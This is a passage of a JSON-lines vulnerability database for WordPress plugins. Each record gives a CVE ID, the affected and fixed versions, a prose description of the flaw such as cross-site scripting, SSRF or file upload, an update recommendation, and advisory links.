version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peachpay-for-woocommerce\\\/tags\\\/1.107.0\\\/core\\\/modules\\\/field-editor\\\/admin\\\/settings-field-editor.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peachpay-for-woocommerce\\\/tags\\\/1.107.0\\\/core\\\/modules\\\/field-editor\\\/admin\\\/settings-field-editor.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193722%40peachpay-for-woocommerce&new=3193722%40peachpay-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193722%40peachpay-for-woocommerce&new=3193722%40peachpay-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcd44c3-75e6-453f-a9e7-3a547eba55e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcd44c3-75e6-453f-a9e7-3a547eba55e1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8673","slug":"z-downloads","versionImpact":"1.11.6","versionEndExcluding":"1.11.7","description":"The Z-Downloads WordPress plugin before 1.11.7 does not properly validate uploaded files allowing for the uploading of SVGs containing malicious JavaScript.","recommendation":"Update to version 1.11.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fed2cd26-7ccb-419d-b589-978410953bf4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fed2cd26-7ccb-419d-b589-978410953bf4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8703","slug":"z-downloads","versionImpact":"1.11.5","versionEndExcluding":"1.11.6","description":"The Z-Downloads WordPress plugin before 1.11.6 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks when accessing share URLs.","recommendation":"Update to version 1.11.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/604e990e-9bec-469e-8630-605eea74e12c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/604e990e-9bec-469e-8630-605eea74e12c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8699","slug":"z-downloads","versionImpact":"1.11.4","versionEndExcluding":"1.11.5","description":"The Z-Downloads WordPress plugin before 1.11.5 does not properly validate files uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)","recommendation":"Update to version 1.11.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9013351e-224f-4696-970f-eb843dc8dace\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9013351e-224f-4696-970f-eb843dc8dace\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5024","slug":"memberpress","versionImpact":"1.11.29","versionEndExcluding":"1.11.30","description":"The Memberpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mepr_screenname' and 'mepr_key' parameter in all versions up to, and including, 1.11.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.11.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718d12fe-31e4-4fa1-ba9a-8626df8ddbfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718d12fe-31e4-4fa1-ba9a-8626df8ddbfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/#1.11.30\",\"name\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/#1.11.30\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5031","slug":"memberpress","versionImpact":"1.11.29","versionEndExcluding":"1.11.30","description":"The Memberpress plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 1.11.29 via the 'mepr-user-file' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.11.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80064e3b-6996-49eb-a475-0ffe0e894f9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80064e3b-6996-49eb-a475-0ffe0e894f9e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5025","slug":"memberpress","versionImpact":"1.11.29","versionEndExcluding":"1.11.30","description":"The Memberpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018arglist\u2019 parameter in all versions up to, and including, 1.11.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.11.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f147641a-f430-4743-901e-539373dc10b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f147641a-f430-4743-901e-539373dc10b7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0176","slug":"rafflepress","versionEndExcluding":"1.11.3","description":"The Giveaways and Contests by RafflePress WordPress plugin before 1.11.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a762c25b-5c47-400e-8964-407cf4c94e9f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a762c25b-5c47-400e-8964-407cf4c94e9f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5615","slug":"opengraph","versionImpact":"1.11.2","versionEndExcluding":"1.11.3","description":"The Open Graph plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.11.2 via the 'opengraph_default_description' function. This makes it possible for unauthenticated attackers to extract sensitive data including partial content of password-protected blog posts.","recommendation":"Update to version 1.11.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f57dc0fe-07f3-457e-8080-fe530f6a9f01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f57dc0fe-07f3-457e-8080-fe530f6a9f01?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opengraph\\\/trunk\\\/opengraph.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opengraph\\\/trunk\\\/opengraph.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097574\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097574\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5219","slug":"google-maps-easy","versionImpact":"1.11.15","versionEndExcluding":"1.11.16","description":"The Easy Google Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file upload feature in all versions up to, and including, 1.11.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.11.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af9c623-1539-4afc-9dcd-3f97d29aa4f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af9c623-1539-4afc-9dcd-3f97d29aa4f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-maps-easy\\\/tags\\\/1.11.15\\\/modules\\\/icons\\\/mod.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-maps-easy\\\/tags\\\/1.11.15\\\/modules\\\/icons\\\/mod.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105921\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105921\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51419","slug":"bertha-ai-free","versionEndExcluding":"1.11.10.8","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Bertha.Ai BERTHA AI. Your AI co-pilot for WordPress and Chrome.This issue affects BERTHA AI. Your AI co-pilot for WordPress and Chrome: from n\/a through 1.11.10.7.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bertha-ai-free\\\/wordpress-bertha-ai-plugin-1-11-10-7-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bertha-ai-free\\\/wordpress-bertha-ai-plugin-1-11-10-7-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7387","slug":"lana-downloads-manager","versionImpact":"1.10.0","versionEndExcluding":"1.11.0","description":"The Lana Downloads Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the endpoint parameters in versions up to, and including, 1.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with administrator-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.11.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lana-downloads-manager\\\/tags\\\/1.10.0\\\/lana-downloads-manager.php#L763\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lana-downloads-manager\\\/tags\\\/1.10.0\\\/lana-downloads-manager.php#L763\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3324923\\\/lana-downloads-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3324923\\\/lana-downloads-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be0db9ff-dc95-4c92-8dc4-472c5df9c0dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be0db9ff-dc95-4c92-8dc4-472c5df9c0dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0172","slug":"juicer","versionEndExcluding":"1.11","description":"The Juicer WordPress plugin before 1.11 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c8982b8d-985f-4a5d-840d-e8be7c3405bd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c8982b8d-985f-4a5d-840d-e8be7c3405bd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13123","slug":"advanced-form-integration","versionImpact":"1.99.0","versionEndExcluding":"1.100.0","description":"The AFI  WordPress plugin before 1.100.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.100.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/417178de-17ff-438c-a36c-b90db6486a46\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/417178de-17ff-438c-a36c-b90db6486a46\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13122","slug":"advanced-form-integration","versionImpact":"1.99.0","versionEndExcluding":"1.100.0","description":"The AFI  WordPress plugin before 1.100.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.100.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/512721cb-e544-4d26-87ca-43d83e77f8e4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/512721cb-e544-4d26-87ca-43d83e77f8e4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12434","slug":"suremembers","versionImpact":"1.10.6","versionEndExcluding":"1.10.7","description":"The SureMembers plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.10.6 via the REST API. This makes it possible for unauthenticated attackers to extract sensitive data including restricted content.","recommendation":"Update to version 1.10.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/suremembers.com\\\/whats-new\\\/\",\"name\":\"https:\\\/\\\/suremembers.com\\\/whats-new\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f33e0019-e52e-464b-843d-a034e5205b2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f33e0019-e52e-464b-843d-a034e5205b2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3912","slug":"ws-form","versionImpact":"1.10.35","versionEndExcluding":"1.10.36","description":"The WS Form LITE \u2013 Drag & Drop Contact Form Builder for WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_config' function in all versions up to, and including, 1.10.35. This makes it possible for unauthenticated attackers to read the value of the plugin's settings, including API keys for integrated services.","recommendation":"Update to version 1.10.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-form\\\/trunk\\\/api\\\/class-ws-form-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-form\\\/trunk\\\/api\\\/class-ws-form-api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-form\\\/trunk\\\/includes\\\/class-ws-form-common.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-form\\\/trunk\\\/includes\\\/class-ws-form-common.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-form\\\/trunk\\\/includes\\\/class-ws-form-config.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-form\\\/trunk\\\/includes\\\/class-ws-form-config.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-form\\\/trunk\\\/ws-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-form\\\/trunk\\\/ws-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280355\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3280355\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f6058e2-a5ec-43b2-9cb7-9efcf0853ffc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f6058e2-a5ec-43b2-9cb7-9efcf0853ffc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3186","slug":"popup-by-supsystic","versionEndExcluding":"1.10.19","description":"The Popup by Supsystic WordPress plugin before 1.10.19 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties into Object.prototype.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/545007fc-3173-47b1-82c4-ed3fd1247b9c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/545007fc-3173-47b1-82c4-ed3fd1247b9c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5060","slug":"include-lottie-animation-for-elementor","versionImpact":"1.10.9","versionEndExcluding":"1.10.10","description":"The LottieFiles \u2013 JSON Based Animation Lottie & Bodymovin for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.10.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.10.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74f59ee0-19dd-4cc9-ab24-22f26d71d248?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74f59ee0-19dd-4cc9-ab24-22f26d71d248?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/include-lottie-animation-for-elementor\\\/tags\\\/1.10.9\\\/include\\\/jbafe-json-anim-widget.php#L1180\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/include-lottie-animation-for-elementor\\\/tags\\\/1.10.9\\\/include\\\/jbafe-json-anim-widget.php#L1180\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3089058%40include-lottie-animation-for-elementor%2Ftags%2F1.10.9&new=3089058%40include-lottie-animation-for-elementor%2Ftags%2F1.10.10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3089058%40include-lottie-animation-for-elementor%2Ftags%2F1.10.9&new=3089058%40include-lottie-animation-for-elementor%2Ftags%2F1.10.10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2705","slug":"gAppointments","versionEndExcluding":"1.10.0","description":"The gAppointments WordPress plugin before 1.10.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b3c83ad-d490-4ca3-8589-39163ea5e24b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b3c83ad-d490-4ca3-8589-39163ea5e24b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12040","slug":"woo-product-carousel-slider-and-grid-ultimate","versionImpact":"1.9.10","versionEndExcluding":"1.10.0","description":"The Product Carousel Slider & Grid Ultimate for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9.10 via the 'theme' attribute of the `wcpcsu` shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203986\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.10.0\\\/includes\\\/classes\\\/class-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203986\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.10.0\\\/includes\\\/classes\\\/class-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c22de8c-e6e1-4b85-8d9f-619e9f63129e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c22de8c-e6e1-4b85-8d9f-619e9f63129e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2048","slug":"lana-downloads-manager","versionImpact":"1.9.0","versionEndExcluding":"1.10.0","description":"The Lana Downloads Manager WordPress plugin before 1.10.0 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks and download arbitrary files on the server","recommendation":"Update to version 1.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05c664e8-110e-4a31-8377-41a0422508a7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05c664e8-110e-4a31-8377-41a0422508a7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12524","slug":"clinked-client-portal","versionImpact":"1.9","versionEndExcluding":"1.10","description":"The Clinked Client Portal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'clinked-login-button' shortcode in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clinked-client-portal\\\/trunk\\\/clinked-wordpress-plugin.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clinked-client-portal\\\/trunk\\\/clinked-wordpress-plugin.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3229331%40clinked-client-portal&new=3229331%40clinked-client-portal&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3229331%40clinked-client-portal&new=3229331%40clinked-client-portal&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417b9dfe-2571-4816-af55-c7cb7dfa62c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417b9dfe-2571-4816-af55-c7cb7dfa62c6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4602","slug":"embed-peertube-playlist","versionImpact":"1.07","versionEndExcluding":"1.10","description":"The Embed Peertube Playlist WordPress plugin before 1.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc15bac7-8241-472a-a7c1-58070714501d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc15bac7-8241-472a-a7c1-58070714501d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2013-10029","slug":"wordpress-exit-box-lite","versionImpact":"1.06","versionEndExcluding":"1.10","description":"A vulnerability classified as problematic was found in Exit Box Lite Plugin up to 1.06 on WordPress. Affected by this vulnerability is the function exitboxadmin of the file wordpress-exit-box-lite.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. Upgrading to version 1.10 is able to address this issue. The patch is named fad26701addb862c51baf85c6e3cc136aa79c309. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230671.","recommendation":"Update to version 1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230671\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230671\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230671\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230671\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wordpress-exit-box-lite\\\/commit\\\/fad26701addb862c51baf85c6e3cc136aa79c309\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wordpress-exit-box-lite\\\/commit\\\/fad26701addb862c51baf85c6e3cc136aa79c309\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2013-10030","slug":"wordpress-exit-box-lite","versionImpact":"1.06","versionEndExcluding":"1.10","description":"A vulnerability, which was classified as problematic, has been found in Exit Box Lite Plugin up to 1.06 on WordPress. Affected by this issue is some unknown functionality of the file wordpress-exit-box-lite.php. The manipulation leads to information disclosure. The attack may be launched remotely. Upgrading to version 1.10 is able to address this issue. The name of the patch is fad26701addb862c51baf85c6e3cc136aa79c309. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230672.","recommendation":"Update to version 1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230672\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230672\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230672\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230672\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wordpress-exit-box-lite\\\/commit\\\/fad26701addb862c51baf85c6e3cc136aa79c309\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wordpress-exit-box-lite\\\/commit\\\/fad26701addb862c51baf85c6e3cc136aa79c309\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4329","slug":"thim-elementor-kit","versionImpact":"1.1.9","versionEndExcluding":"1.1.9.1","description":"The Thim Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3275c47d-caf5-49e6-8aa2-20a6d8106f26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3275c47d-caf5-49e6-8aa2-20a6d8106f26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thim-elementor-kit\\\/tags\\\/1.1.9.1\\\/inc\\\/elementor\\\/widgets\\\/global\\\/search-form.php#L819\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thim-elementor-kit\\\/tags\\\/1.1.9.1\\\/inc\\\/elementor\\\/widgets\\\/global\\\/search-form.php#L819\",\"refsource\":\"\",\"tags\":[]}]"}
